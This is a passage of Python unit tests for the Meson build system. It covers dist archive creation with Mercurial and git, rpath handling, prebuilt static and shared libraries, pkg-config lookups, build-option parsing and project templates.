if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
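        '''
        Create a throwaway version-controlled project, run 'meson dist' and
        verify which archive formats and (optionally) subprojects end up in
        the generated archives.
        '''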
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
                self.assertIsNone(rpath)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
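        # Returns the host C compiler, its static linker and the platform's
        # object / shared-library suffixes, for the prebuilt-artifact tests below.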
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
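        # Compile a single source file to an object file outside of Meson,
        # using MSVC- or Unix-style arguments depending on the compiler.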
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
        # Build the archive command via the detected static linker object; this
        # covers both ar-style and MSVC lib.exe-style static linkers.
        link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
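        # Link a shared library directly with the compiler (link.exe style on
        # MSVC, -shared elsewhere) so tests can exercise prebuilt shared libs.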
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
        '''
        Test that we prefer static libraries when `static: true` is passed to
        dependency() with pkg-config. Can't be an ordinary test because we
        need to build the libs and then try to find them from meson.build.
        Also test that unsatisfiable library deps are not a hard error, since
        system libraries such as -lm will never be found statically.
        https://github.com/mesonbuild/meson/issues/2785
        '''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
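        '''
        Test that paths in the generated pkg-config file are escaped properly:
        the prefix deliberately contains a space, and the -L/-I arguments must
        still come back from pkg-config as single, properly quoted arguments.
        '''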
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
        # pkg-config and pkgconf do not return the compile args in the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
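        # Assert that the introspected build option `name` has the given value.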
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
                elif lang == 'java':
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
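        # Taking the build directory lock twice must raise a MesonException.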
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
            # Static libraries are not linkable with -l with msvc because meson
            # installs them as .a files, which unix_args_to_native will not
            # recognize since it expects libraries to use the .lib extension.
            # For a DLL the import library is installed as .lib. Thus for msvc
            # this test needs to use shared libraries to exercise the path
            # resolving logic in the dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
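        # For each library-path flag flavour: build and install the library,
        # build a consumer that only finds it via LDFLAGS, then change the
        # library's exports and check that the consumer gets relinked.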
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
            # assert that the user of the library will be rebuilt
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
            self.installdir = initial_installdir
            self.builddir = initial_builddir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
